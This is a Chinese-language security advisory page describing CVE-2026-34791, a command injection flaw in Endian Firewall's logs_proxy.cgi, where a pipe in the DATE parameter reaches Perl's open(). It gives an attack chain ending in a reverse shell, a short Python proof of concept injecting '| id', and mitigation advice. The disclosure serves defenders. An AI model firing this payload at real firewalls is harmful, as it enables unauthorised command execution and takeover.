IPBUF安全漏洞报告
English
CVE-2026-34791 CVSS 8.8 高危

CVE-2026-34791 Endian防火墙命令注入漏洞

披露日期: 2026-04-02

漏洞信息

漏洞编号
CVE-2026-34791
漏洞类型
命令注入
CVSS评分
8.8 高危
攻击向量
网络 (AV:N)
认证要求
低权限 (PR:L)
用户交互
无需交互 (UI:N)
影响产品
Endian Firewall

相关标签

命令注入RCEEndian FirewallCGIPerl

漏洞概述

Endian Firewall 3.3.25及之前版本存在安全漏洞。由于/cgi-bin/logs_proxy.cgi接口中对DATE参数的正则表达式验证不完整,攻击者可利用该参数构造恶意文件路径并通过Perl的open()函数调用,从而在系统上执行任意操作系统命令。该漏洞需要低权限用户认证,成功利用可能导致系统被完全控制。

技术细节

该漏洞的根源在于Endian Firewall处理日志请求时的输入验证逻辑存在缺陷。具体而言,受影响的组件是/cgi-bin/logs_proxy.cgi脚本,该脚本使用Perl语言编写。在处理用户提交的DATE参数时,脚本试图将其作为文件名的一部分进行操作。尽管开发者实施了一定的正则表达式验证,但该验证逻辑并不完整,未能妥善处理管道符(|)等Shell元字符。在Perl中,open()函数具有强大的功能,如果文件名中包含管道符,例如open(FH, "file | command"),Perl会将其解释为执行命令并读取输出。攻击者利用这一点,通过在DATE参数中注入形如"| malicious_command"的字符串,绕过不完整的正则检查。当脚本调用open()处理该参数时,Perl会将其解析为系统命令执行而非文件操作。由于该接口需要低权限认证(PR:L),一旦攻击者获取了普通用户凭证,即可利用此漏洞提升权限并执行任意操作系统命令。

攻击链分析

STEP 1
侦察
攻击者识别目标为Endian Firewall,并确定版本在3.3.25及以下。
STEP 2
认证
攻击者获取低权限账户凭证(CVSS PR:L),登录Web管理界面。
STEP 3
漏洞利用
攻击者向/cgi-bin/logs_proxy.cgi发送特制请求,在DATE参数中注入管道符及系统命令(如 | whoami)。
STEP 4
命令执行
后端Perl脚本因正则验证不完整,将参数传递给open()函数,导致恶意命令在服务器端执行。
STEP 5
建立控制
攻击者利用执行命令的能力反弹Shell或进一步提权,完全控制服务器。

PoC / 利用代码

⚠️ 仅供安全研究
以下代码仅用于安全研究和授权测试,未经授权使用属于违法行为。
PoC
import requests # Target URL url = "http://target-ip/cgi-bin/logs_proxy.cgi" # Vulnerable parameter: DATE # The Perl open() call interprets the pipe (|) as a command execution operator # Example payload: | id (executes the 'id' command) payload = "| id" # Authentication may be required (CVSS PR:L) # Replace with valid session cookie or auth headers cookies = { "sid": "valid_session_id_here" } params = { "DATE": payload } try: response = requests.get(url, params=params, cookies=cookies, timeout=10) print(f"Status Code: {response.status_code}") print("Response Body:") print(response.text) except Exception as e: print(f"Error: {e}")

影响范围

Endian Firewall <= 3.3.25

防御指南

临时缓解措施
建议立即检查Endian Firewall版本并应用官方补丁。如果无法立即升级,应通过网络访问控制列表(ACL)严格限制对管理界面的访问来源,仅允许可信管理IP访问。同时,应加强对系统日志的监控,及时发现针对/cgi-bin路径的异常请求。

参考链接

快速导航: 前沿安全 最新收录域名列表 最新威胁情报列表 最新网站排名列表 最新工具资源列表 最新CVE漏洞列表